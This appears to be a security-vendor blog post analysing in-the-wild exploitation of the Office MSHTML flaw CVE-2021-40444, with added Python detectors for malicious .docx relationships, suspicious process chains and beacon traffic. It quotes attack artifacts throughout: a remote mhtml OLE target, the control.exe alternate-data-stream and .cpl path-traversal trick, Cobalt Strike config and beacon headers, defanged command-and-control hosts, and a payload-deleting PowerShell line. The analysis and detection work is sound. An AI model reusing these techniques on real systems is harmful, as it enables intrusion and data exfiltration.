Microsoft Office has long been a common attack vector, with abuse of its macro functionality a firm favorite of phishing and malspam attacks. These typically attempt to infect users through maliciously crafted Word or Excel files received as an attachment or as a download link via email. Macro-based attacks, however, require an extra social engineering step or two as such functionality has to be explicitly approved by the user on a per-document basis. CVE-2021-40444, however, is a Microsoft Office MSHTML Remote Code Execution Vulnerability that requires no macros and only a single approval to “display content”. Threat actors wasted no time in putting this zero day vulnerability to ill-use before Microsoft provided a fix in September’s Patch Tuesday. In this post, we provide a technical analysis of how this CVE is being exploited in the wild.
How Attackers Exploit CVE-2021-40444 In The Wild
A user who opens the malicious document will see a very short progress bar loading the remote content:
Once the remote content is downloaded, a normal Word document is displayed:
Looking at the .docx document relationships:
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:hxxp://pawevi[.]com/e32c8df2cf6b7a16/specify.html!x-usc:hxxp://pawevi[.]com/e32c8df2cf6b7a16/specify.html" TargetMode="External"/>
The “document.xml” contains an HTML file OLE object:
A snippet of the attacking code:
The attackers used a combination of old and new techniques. One of the old-school methods involved mhtml (side.html, help.html, specify.html, mountain.html) to load MIME content (message/rfc822), which is structured like an email message and allows the attackers to retrieve encapsulated payload files without using a traditional file download over HTTP.
This means that at least part of the payload will bypass most common web proxies, filtering and content validation systems.
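A triage check for the relationship pattern shown above, written here as an added example (not code from the original post): it walks the .rels parts of a .docx and flags any external oleObject relationship, or any target using the mhtml:/!x-usc: chaining. The document builder and the attacker.invalid URL are constructed test inputs.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import quoteattr

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
# The in-the-wild documents pointed an external OLE object at an mhtml: URL that
# chains a second URL with !x-usc:, so MIME-wrapped content is fetched remotely.
REMOTE_MIME = re.compile(r"^mhtml:|!x-usc:", re.IGNORECASE)

def find_external_ole(docx_bytes: bytes) -> list:
    """Return (rel Id, Target) for every external oleObject or mhtml-style
    relationship found in the word/ part of a .docx (a zip container)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("word/") and name.endswith(".rels")):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                if rel.get("Type") == OLE_TYPE or REMOTE_MIME.search(target):
                    hits.append((rel.get("Id"), target))
    return hits

def build_sample_docx(target: str, rel_type: str = OLE_TYPE) -> bytes:
    """Constructed minimal .docx carrying one external relationship (test input)."""
    rels = ('<Relationships xmlns="%s"><Relationship Id="rId5" Type=%s '
            'Target=%s TargetMode="External"/></Relationships>'
            % (REL_NS, quoteattr(rel_type), quoteattr(target)))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()

# Constructed URL (not the real infrastructure named in the post).
MALICIOUS = ("mhtml:http://attacker.invalid/e32c8/specify.html"
             "!x-usc:http://attacker.invalid/e32c8/specify.html")
```

Run it over real mail attachments by reading the file bytes into find_external_ole; a plain external hyperlink relationship is not flagged, only OLE objects and mhtml-style targets.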
Abusing LOLBins and Cobalt Strike with CVE-2021-40444
A classic characteristic of sophisticated attacks is the use of LOLBins (operating system built-in tools) to disguise the attack as normal system behavior. A well-known LOLBin technique is control.exe c:\windows\tasks\file.txt:evil.dll, which loads a DLL hidden inside an "Alternate Data Stream" (a secondary file stream that the Windows UI does not display). The samples seen to date use this technique in combination with a .cpl extension and a "path traversal" to load a file written to disk by Microsoft Word.
This technique abuses the Windows control panel binary control.exe to load the attackers' championship.inf file. This file is typically dropped on disk at the following location:
The malware can resolve the relative path to that location as
The compilation date on observed samples was August 20, 2021, meaning this zero day exploit was in the wild at least 25 days before a patch was available.
The final payload is a Cobalt Strike Beacon DLL. Most observed samples communicate with a team server at /static-directory/media.gif and /static-directory/templates.gif to get the payload shellcode of type CobaltStrike_HTTPReverseShellcodex64.
Cobalt Strike config (excerpt):
"Remove 338 bytes from the beginning",
"NetBIOS decode 'A'",
"Proxy_Behavior": "Use IE settings",
The Cobalt Strike payload DLL was built using the Boost C++ framework and has lib_openssl (1.1.0f) statically compiled into it:
It downloads a remote shellcode:
The payload then uses WMI via COM (executed by the svchost.exe hosting RasMan [netsvcs]) to execute one of three built-in Windows apps:
On Windows 10, it's usually wabmig.exe, the built-in "Windows Mail" application (%ProgramFiles%\windows mail\wabmig.exe). The payload DLL assumes SeDebugPrivilege and injects the shellcode into wabmig.exe. It then uses the same WMI process to run a PowerShell instance that deletes the payload DLL from disk:
powershell -c "Sleep 5 ; Remove-Item -Path "C:\Users\…" -Force"
Observed process and network chain:
WinWord.exe -> Control.exe -> rundll32.exe -> requests payload from hxxps://macuwuf[.]com/get_load (User-Agent: "bumblebee") -> svchost.exe (Remote Access Connection Manager, "svchost.exe -k netsvcs") -> wmiprvse.exe (WMI) -> wabmig.exe ("Windows Mail") -> code injection -> beacon traffic with spoofed headers (Host: microsoft.com; User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9) -> request "dodefoh[.]com/ml.html?dbprefix=false"
Example beacon request headers:
Host: microsoft.com Connection: close Cookie: HSID=qa4NarNdu0U3b92eKlbW78+/fox2qG9E/+DLkr/F8TZ2N3a+n3wlLc1Z/Z3cRoKi68NNajtE14NxgljBdE8Y1hHYU5Ix4JH3xIkib6AaM404V4CW3ztax68SJPOsiKpWUaE/D46n2EPLDF7ZDFdcUV/7p95zuv322d/2d988ktya1gq1
Host: microsoft.com Connection: close Cookie: HSID=Oq81LSBcgwKkbuXZuVfuqFy+RsvlqVcDbOHz1SzEyXHlNk75DH0dal5YxdpPR7rleMJ1LahF78Tig2CG504gkYLZa9Wi4amwV4gaKDMbC8qrVrjRTDpigDwTHLQ/iZIRwqAHSB2m4ARYDWaen1ZkFsz6n5ngu8WxSt7OMEw9qpsJ1zLy
powershell.exe -> delete payload DLL
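Detection logic for the process chain above and for the control.exe LOLBin technique described earlier, as an added example rather than anything from the post or from SentinelOne: it runs a few process-ancestry and command-line rules over constructed process-creation events (pid, parent pid, image, command line), the shape Sysmon Event ID 1 or an EDR would provide. The command lines in SAMPLE are constructed; only the binary names and the .cpl/championship.inf pattern come from the post.

```python
import re
from collections import namedtuple

ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")

# Binary names from the chain described above; the sample events below are constructed.
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
LOLBINS = {"control.exe", "rundll32.exe"}
WMI_CHILDREN = {"wabmig.exe", "powershell.exe"}
# A .cpl argument walking out of its directory, and a DLL/CPL loaded from an alternate data stream.
CPL_TRAVERSAL = re.compile(r'\.cpl:\.\.[/\\]', re.IGNORECASE)
ADS_LOAD = re.compile(r'\w:[^\s"]*\.\w+:[^\s"]+\.(?:dll|cpl)\b', re.IGNORECASE)

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def office_ancestor(e, by_pid, hops=3):
    for _ in range(hops):  # walk up a few parents: Word -> control.exe -> rundll32.exe
        e = by_pid.get(e.ppid)
        if e is None: return False
        if basename(e.image) in OFFICE: return True
    return False

def detect(events):
    """Return (pid, rule) pairs for events matching the chain described above."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        if name in LOLBINS and office_ancestor(e, by_pid):
            alerts.append((e.pid, "office-descendant-lolbin"))
        if name == "control.exe" and CPL_TRAVERSAL.search(e.cmdline):
            alerts.append((e.pid, "cpl-path-traversal"))
        if name in LOLBINS and ADS_LOAD.search(e.cmdline):
            alerts.append((e.pid, "ads-dll-load"))
        if pname == "wmiprvse.exe" and name in WMI_CHILDREN:
            alerts.append((e.pid, "wmi-spawned-" + name[:-4]))
    return alerts

SAMPLE = [  # constructed process-creation events (pid, ppid, image, cmdline)
    ProcEvent(100, 1, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "WINWORD.EXE /n invoice.docx"),
    ProcEvent(200, 100, r"C:\Windows\System32\control.exe", 'control.exe ".cpl:../../../AppData/Local/Temp/championship.inf"'),
    ProcEvent(300, 200, r"C:\Windows\System32\rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
    ProcEvent(400, 50, r"C:\Windows\System32\wbem\WmiPrvSE.exe", "WmiPrvSE.exe"),
    ProcEvent(500, 400, r"C:\Program Files\Windows Mail\wabmig.exe", "wabmig.exe"),
    ProcEvent(600, 400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r'powershell -c "Sleep 5 ; Remove-Item -Path C:\Users\u\payload.dll -Force"'),
    ProcEvent(800, 1, r"C:\Windows\System32\control.exe", r"control.exe c:\windows\tasks\file.txt:evil.dll"),
]
```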
The injected wabmig.exe sends an average of 400 HTTP GET requests of about ±1.05kb each, randomized between the two host names joxinu[.]com and dodefoh[.]com at /avatars, /ml.js?restart=false and /hr.html?dbprefix=false. It leaks information from the host as encrypted data, wrapped in base64, in the HTTP "HSID" cookie header.
Environments that are not set up to scan GET requests at the gateway/proxy could overlook this traffic, or fail to recognize it as anomalous or malicious.
In the exfiltration part, one of the servers is typically in Germany and the other one is in the US.
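The exfiltration traffic just described has two properties a proxy can key on: the Host header names microsoft.com while the connection goes to an unrelated host, and the only cookie is one long base64 blob sent on repeated GETs. The scanner below is an added example, not from the post; it reads a constructed tab-separated proxy log (client, destination host actually connected to, method, path, Host header sent, Cookie header) and assumes the proxy records the real destination and the request headers, which requires TLS inspection for HTTPS.

```python
import re
from collections import defaultdict

# Constructed proxy records: client, destination actually connected to (SNI/CONNECT
# target), method, path, Host header sent by the client, Cookie header.
SAMPLE_LOG = """\
10.0.0.5\tjoxinu.invalid\tGET\t/avatars\tmicrosoft.com\tHSID=Qk9HVVMQk9HVVMQk9HVVMQk9HVVMQk9HVVMQk9HVVMQk9HVVMQk9HVVM
10.0.0.5\tdodefoh.invalid\tGET\t/ml.js?restart=false\tmicrosoft.com\tHSID=c2VjcmV0c2VjcmV0c2VjcmV0c2VjcmV0c2VjcmV0c2VjcmV0
10.0.0.5\tdodefoh.invalid\tGET\t/hr.html?dbprefix=false\tmicrosoft.com\tHSID=MDEyMzQ1MDEyMzQ1MDEyMzQ1MDEyMzQ1MDEyMzQ1MDEyMzQ1
10.0.0.7\twww.microsoft.com\tGET\t/en-us/\twww.microsoft.com\tMUID=0f3a
"""

KNOWN_PATHS = {"/avatars", "/ml.js?restart=false", "/hr.html?dbprefix=false", "/ml.html?dbprefix=false"}
# A cookie value that is nothing but a long base64 run: real session cookies rarely look like this.
BLOB = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")

def parse(line):
    client, dst, method, path, host, cookie = line.split("\t")
    return dict(client=client, dst=dst, method=method, path=path, host=host, cookie=cookie)

def flag_request(r):
    """Per-request reasons; an empty list means the request looks ordinary."""
    reasons = []
    if r["host"].lower() != r["dst"].lower():
        reasons.append("host-header-mismatch")  # Host: microsoft.com sent to another server
    if r["path"] in KNOWN_PATHS:
        reasons.append("known-beacon-path")
    for part in r["cookie"].split(";"):
        name, _, value = part.strip().partition("=")
        if BLOB.match(value):
            reasons.append("base64-blob-cookie:" + name)
    return reasons

def scan(log_text, beacon_threshold=2):
    """Return (per-request alerts, (client, dst, count) pairs at or above the threshold)."""
    alerts, counts = [], defaultdict(int)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        r = parse(line)
        reasons = flag_request(r)
        if reasons:
            alerts.append((r["client"], r["dst"], r["path"], reasons))
            counts[(r["client"], r["dst"])] += 1  # repeated flagged GETs to one host = beaconing
    beacons = [(c, d, n) for (c, d), n in counts.items() if n >= beacon_threshold]
    return alerts, beacons
```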
Responses to Microsoft’s Patch for CVE-2021-40444
Since the discovery of the first samples, several exploit document builders have been published. These allow pentesters, defenders, and also lower caliber attackers to create exploit docs leveraging this vulnerability.
On the latest patch Tuesday (Sep 14, 2021), Microsoft released a patch for the CVE-2021-40444 vulnerability. Following the release of the patch, Microsoft published its own analysis of the attack using this exploit.
Chinese security researcher sunglin from the 404 Team of KnownSec has published a reverse engineering analysis of Microsoft's patch which demonstrates how Microsoft implemented the fix, overwriting filenames containing a "/" with "".
New tricks are already being used to bypass signatures and static detections for this exploit: the first are in-the-wild samples that use XML entity encoding, and there is also a technique which appears to bypass Windows Authenticode signature checking for .cab files larger than 1Gb.
On Sep 19, 2021, a new variant of this exploit was published. This new variant doesn’t require a .cab file for exploitation and instead uses a .wsf Windows script file to execute code. In addition, researchers have suggested connections between the threat actors and the Ryuk ransomware group, although the exact nature of the connection remains unclear.
Defending Against Exploitation of CVE-2021-40444
Despite the fact that Microsoft has patched the underlying vulnerability, many organizations remain vulnerable to this type of attack either through failing to update in a timely fashion or from new variants that don’t use a .cab file.
SentinelOne customers are protected against this and related attacks.
Targeted attacks exploiting CVE-2021-40444 have been seen in the wild and appear to be ongoing. Sectors including critical infrastructure like Energy, Finance, IT and Telecoms have all reportedly been targeted, among others. SentinelOne urges enterprise security teams to take appropriate measures to ensure they are protected against this attack vector. If you would like to know more about how SentinelOne can keep your business safe from this and other attacks, contact us for more information or request a free demo.
Indicators of Compromise
Word Document Samples
DLL/EXE Payloads (championship.inf)